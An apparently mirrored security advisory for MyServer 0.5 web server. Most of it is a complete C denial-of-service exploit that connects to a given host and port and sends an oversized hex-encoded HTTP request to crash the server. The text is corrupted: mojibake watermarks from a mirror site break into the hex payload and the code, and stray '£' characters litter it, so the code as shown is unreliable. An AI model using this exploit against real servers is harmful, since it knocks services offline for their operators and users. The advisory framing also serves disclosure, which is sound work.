MyServer DoS (Exploit)

Summary
MyServer is a powerful and easy to configure web server. MyServer is Free Software and it is licensed under the GNU GPL terms.

A vulnerability in MyServer allows to perform DoS attacks against vulnerable servers.
 
Credit:
The information has been provided by Federico Fazzi.
Related article can be found at:
http://www.securiteam.com/securitynews/6O00C208UM.html£ 
 
 Details
Vulnerable Systems:
 * MyServer version 0.5.

Exploit:
/* MyServer 0.5 denial of service */
/* bug found by badpack3t. */
/* http://myserverweb.sourceforge.net */
/* */
/* $ gcc -o f_ms f_ms-0.5.c (linux version) */
/* $ gcc -o f_ms f_ms-0.5.c -DWINDOWS (windows version) */
/* */
/* $ ./f_ms <hostname/ip> <port> */
/* */
/* Federico Fazzi <federico@autistici.org> */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#if WINDOWS
#include <winsock.h>
#pragma comment(lib, "ws2_32.lib")
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>
#endif

int usage(char *f);

char f_call[] = "\x47\x45\x54\x20\x2f\x41\x41\x41\x41\x41"
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

Íø¹Üu¼Òu.bitsCN.com

  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x01\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x2e"
  "\x68\x74\x6d\x6c\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d\x0a\x52"
  "\x65\x66\x65\x72\x65\x72\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6c"
  "\x6f\x63\x61\x6c\x68\x6f\x73\x74\x2f\x66\x75\x78\x30\x72\x0d\x0a"
  "\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70"
  "\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d"
  "\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x0d"
  "\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65" Íø¹ÜÍøwww.bitscn.com
  "\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x55\x73\x65\x72\x2d\x41\x67"
  "\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x37"
  "\x36\x20\x5b\x65\x6e\x5d\x20\x28\x58\x31\x31\x3b\x20\x55\x3b\x20"
  "\x4c\x69\x6e\x75\x78\x20\x32\x2e\x34\x2e\x32\x2d\x32\x20\x69\x36"
  "\x38\x36\x29\x0d\x0a\x56\x61\x72\x69\x61\x62\x6c\x65\x3a\x20\x72"
  "\x65\x73\x75\x6c\x74\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x6c\x6f\x63"
  "\x61\x6c\x68\x6f\x73\x74\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d"
  "\x6c\x65\x6e\x67\x74\x68\x3a\x20\x35\x31\x33\x0d\x0a\x41\x63\x63"
  "\x65\x70\x74\x3a\x20\x69\x6d\x61\x67\x65\x2f\x67\x69\x66\x2c\x20"
  "\x69\x6d\x61\x67\x65\x2f\x78\x2d\x78\x62\x69\x74\x6d\x61\x70\x2c"
  "\x20\x69\x6d\x61\x67\x65\x2f\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61"
  "\x67\x65\x2f\x70\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61\x67\x65\x2f"

Íø¹ÜÍøwww.bitscn.com

  "\x70\x6e\x67\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f"
  "\x64\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x0d\x0a\x41\x63\x63\x65"
  "\x70\x74\x2d\x43\x68\x61\x72\x73\x65\x74\x3a\x20\x69\x73\x6f\x2d"
  "\x38\x38\x35\x39\x2d\x31\x2c\x2a\x2c\x75\x74\x66\x2d\x38\x0d\x0a"
  "\x0d\x0a\x77\x68\x61\x74\x79\x6f\x75\x74\x79\x70\x65\x64\x3d\x3f"
  "\x0d\x0a";


int main(int argc, char *argv[]) {

#if WINDOWS
 £  WSADATA wsaData;
 £  WORD wVersionRequested;
 £  int port;
 £  int size;
 £  SOCKET sockfd;
#else
 £  int sockfd;
 £  socklen_t size;
 £  in_port_t port = atoi(argv[2]);
#endif

 £  struct sockaddr_in structaddr;
 £  struct hostent *sockhost;
 £  char *reply = (char *)malloc(512);

 £  if(argc < 2) usage((char *) basename(argv[0]));

#if WINDOWS
 £  wVersionRequested = MAKEWORD(1, 1);
 £  if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
#endif
 £  printf("* MyServer 0.5 denial of service\n\n");
#if WINDOWS
 £  if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) ==
INVALID_SOCKET) {
 perror("socket_func");
  exit(1);
 £  }
#else
 £  if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
 perror("socket_func");
  exit(1);
 £  }
#endif

 £  printf("getting socket.. done!\n");

 £  sockhost = gethostbyname(argv[1]);
 £  if(sockhost == NULL) herror("gethostbyname_func");

 £  size = sizeof(structaddr);
 £  memset((void *) &structaddr, 0x00, size);
 £  bcopy(sockhost->h_addr, &structaddr.sin_addr, sockhost->h_length);
 £  structaddr.sin_family = AF_INET;
 £  structaddr.sin_port = htons((u_short)port);

 £  printf("getting connection.. ");
 £  if(connect(sockfd, (struct sockaddr *) &structaddr, size) == -1) {
 printf("error!\n");
 perror("connect_func");
  exit(1);
 £  }
 £  printf("done!\n");

 £  printf("sending exploit in hex format.. ");
 £  if(write(sockfd, f_call, sizeof(f_call)) == -1) {
 printf("error!\n");
 perror("send_func");
  exit(1);
 £  }
 £  printf("done!\n");

 £  printf("target: %s on port %d have been dossed!\n\n",
sockhost->h_name, port);
#if WINDOWS
 £  closesocket(sockfd);
#else
 £  close(sockfd);
#endif
 £  return(0);
}

int usage(char *f) {

printf("MyServer 0.5 denial of service\n");
printf("Federico Fazzi <federico@autistici.org\n\n");
printf("$ gcc -o %s %s (linux version)\n", f, __FILE__); Íø¹ÜÍøwww_bitscn_com
printf("$ gcc -o %s %s -DWINDOWS (windows version\n", f, __FILE__);

return(1);
}